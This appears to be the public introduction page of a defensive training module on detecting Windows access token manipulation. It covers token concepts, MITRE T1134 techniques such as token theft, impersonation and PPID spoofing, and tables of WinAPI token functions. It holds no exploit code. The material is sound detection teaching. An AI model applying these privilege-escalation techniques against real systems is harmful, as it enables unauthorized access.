New Job-Role Training Path: Active Directory Penetration Tester! Learn More

Detecting Access Token Manipulation Attacks

This module focuses on Windows privilege escalation techniques through access token manipulation. It covers various topics, including Windows processes, access tokens, token privileges, and token manipulation. By using tools such as API Monitor, Process Monitor, Sysmon, WinDbg, and disassemblers for analysis, we will investigate the relevant event logs and telemetry generated through Event Tracing for Windows (ETW).

4.00

Created by MadhukarRaina

Hard Defensive

Summary

This module is centered on understanding access tokens, and the attacks based on access tokens, such as Access Token Manipulation, Access Token Theft, Token impersonation, etc. Additionally, participants will gain hands-on experience in using WinDbg and other tools to analyze processes, tokens, and security descriptors, and monitoring of WINAPI functions.

This module is broken down into sections with accompanying hands-on exercises to practice each of the techniques we cover. The module ends with a practical hands-on skills assessment to gauge your understanding of the various topic areas.

  • Introduction
  • Intro to Toolset
  • Windows Logon Process
  • Process Internals and Protection
  • Understanding Access Tokens
  • Important Token Structures
  • Access Checks
  • Token Privileges
  • Token Enumeration
  • Token Manipulation
  • Token Theft (T1134.001)
  • Token Impersonation
  • Make Access Tokens
  • Network Authentication
  • PPID Spoofing using Access Token
  • Detections Opportunities

Students will also gain insight into the inner workings of access tokens, process creation, parent process PID spoofing, and the importance of access control lists (ACLs) and security descriptors in securing system resources. Furthermore, the module covers the techniques used to create new tokens from user credentials, ways to duplicate tokens, creating new processes with stolen tokens, and token impersonation.

There are also some useful scenarios covered in the module, such as the demonstration and detection of token manipulation, escalation to "NT AUTHORITY\SYSTEM", and scenarios demonstrating how kernel drivers detect attacks such as PPID spoofing. As you work through the module, you will see example commands and command output for the various topics introduced. It is worth reproducing as many of these examples as possible to further reinforce the concepts introduced in each section. You can do this in the Pwnbox provided in the interactive sections or on your own virtual machine.

You can start and stop the module at any time and pick up where you left off. There is no time limit or "grading," but you must complete all of the exercises and the skills assessment to receive the maximum number of cubes and have this module marked as complete in any paths you have chosen.

The module is classified as "Hard" because there is a certain requirement for working knowledge of using debuggers, analysis tools, and an understanding of the Windows command line.

A firm grasp of the following modules can be considered a prerequisites for successful completion of this module:

  • Introduction to Windows Command Line
  • Introduction to Malware Analysis
  • Intro to Assembly Language
  • Basic understanding of C

Introduction

Authentication and authorization are foundational concepts that address two fundamental questions in security:

  • Authentication (Is the entity who it claims to be?): Authentication ensures that the identity of a user, system, or service is genuine. This verification is typically carried out using methods such as passwords, biometrics, or digital certificates. Authentication acts as the initial checkpoint for establishing trust between entities.

  • Authorization (What is the entity allowed to do?): Once authentication is successful, authorization defines the scope of actions or resources the entity is permitted to access. It enforces access controls to ensure that users, applications, or systems operate within their designated permissions.

In Windows environments, authentication and authorization are structured around security principals. These principals represent entities capable of initiating actions or requests and include: users, computers, groups and services. To implement authentication and authorization, Windows relies on two key mechanisms, logon sessions and access tokens.

  • Logon Session: A logon session is created whenever a user successfully signs in to a system. This session uniquely identifies the authenticated user and their session-specific details. For example, when a user logs in, a logon session is established to track their identity and authentication data.

  • Access Token: After the authentication process, Windows generates an access token, which serves as the security context for the user’s processes and threads. This token contains essential details, such as:

    • The user’s unique identifier (SID)
    • Membership in security groups
    • Assigned privileges
    • Integrity levels and associated claims

Access tokens are associated with processes or threads and govern what resources they can access and the actions they can execute. A deeper understanding of tokens is essential for understanding access token manipulation. According to MITRE, Access Token Manipulation (T1134) falls under the Privilege Escalation (TA0004) and Defense Evasion (TA0005) tactics. This involves an adversary manipulating access tokens to bypass access controls and gain unauthorized access to resources within a system or network.

Access Token Manipulation Techniques

The diagram below shows some common access token manipulation scenarios, which include how an access token is stolen from a target process and how an access token is created using stolen credentials. Once the access token is obtained, it can be used to perform further actions (such as PPID Spoofing (T1134.004)). The access token manipulation techniques shown in the diagram below are:

  • Token Privilege Modification
  • Create Process with Token
  • Token Impersonation

Scenarios

This module presents a comprehensive analysis of access token manipulation techniques used by attackers and provides guidance on detecting these threats.

Access token manipulation is a prevalent strategy used by adversaries to escalate privileges and avoid detection in Windows environments. The MITRE ATT&CK page for Access Token Manipulation (T1134.004) provides detailed information in the Procedure Examples section on how various threat actors execute related techniques.

For instance, the screenshot above demonstrates how adversaries manipulate an access token and enable specific privileges, such as SeDebugPrivilege. This privilege allows the debugging or manipulation of processes owned by other users, including those running with elevated privileges.

We can also observe that the AdjustTokenPrivileges() WINAPI function is utilized. This function allows a process to adjust the privileges of an access token. Adversaries can exploit this to enable privileges that are typically disabled (such as SeDebugPrivilege), thereby escalating their privileges to carry out malicious actions.

There are also attempts to escalate privileges to NT Authority\SYSTEM, which is the highest privilege level on a Windows system, equivalent to the root or superuser on Unix-based systems. Adversaries often target this privilege level to gain full control over a compromised system.

Adversaries have also employed access token manipulation techniques to create new tokens from stolen credentials. They have used impersonation to access resources or perform actions that require higher privileges than those of the current user. This technique involves a thread assuming the identity of another user or security principal, typically to perform actions on their behalf. The screenshot below provides examples of various software/groups that have utilized this technique in real-world attacks.

API Functions Related to Access Tokens

API functions related to access tokens allow applications to manage and manipulate these tokens, enabling scenarios like impersonation, privilege elevation, and security checks. Some key API functions related to access tokens are categorized as follows:

Token Creation

These functions are used to create or duplicate tokens:

Function Name Description
OpenProcessToken Opens the access token associated with a process.
OpenThreadToken Opens the access token associated with a thread.
DuplicateToken Duplicates an existing access token, creating a new token with the same properties.
DuplicateTokenEx Duplicates an access token and allows you to specify properties like the desired security level and token type.
CreateRestrictedToken Creates a restricted token by removing privileges or restricting access to specific SIDs.

Token Manipulation

These functions modify or adjust the properties and privileges of tokens:

Function Name Description
AdjustTokenPrivileges Enables or disables privileges in a token.
AdjustTokenGroups Modifies the group memberships in a token.
SetTokenInformation Changes properties of a token, such as default DACL or session ID.

Token Query

These functions retrieve information about a token:

Function Name Description
GetTokenInformation Retrieves information about a token, such as privileges, owner, or groups.
CheckTokenMembership Checks whether a token includes a specific SID in its groups.
IsTokenRestricted Determines if a token is a restricted token.

Token Impersonation

These functions allow threads or processes to impersonate other security contexts:

Function Name Description
ImpersonateLoggedOnUser Allows a thread to impersonate the security context of a logged-on user.
ImpersonateSelf Enables a thread to impersonate itself for certain operations.
RevertToSelf Ends impersonation, reverting the thread back to its original security context.

Miscellaneous

Other important functions related to tokens:

Function Name Description
LogonUser Authenticates a user and returns a token that represents the user.
CreateProcessAsUser Creates a new process using the security context of a specific token.
CreateProcessWithTokenW Similar to CreateProcessAsUser, but explicitly requires a token handle.
SetThreadToken Assigns a token to a thread for impersonation purposes.

Please refer to this Microsoft documentation to get more details on access tokens and WinAPI functions.

Moving On

To understand access tokens and the attack techniques based on them, we'll go through the fundamental concepts related to processes and tokens, explore different ways to create processes, and then examine the attack scenarios and respective detection opportunities in the following sections. In the upcoming section, we'll cover some basic concepts of WinDbg, debuggers, disassemblers, and other tools used throughout this module.

Sign Up / Log In to Unlock the Module

Please Sign Up or Log In to unlock the module and access the rest of the sections.

Sections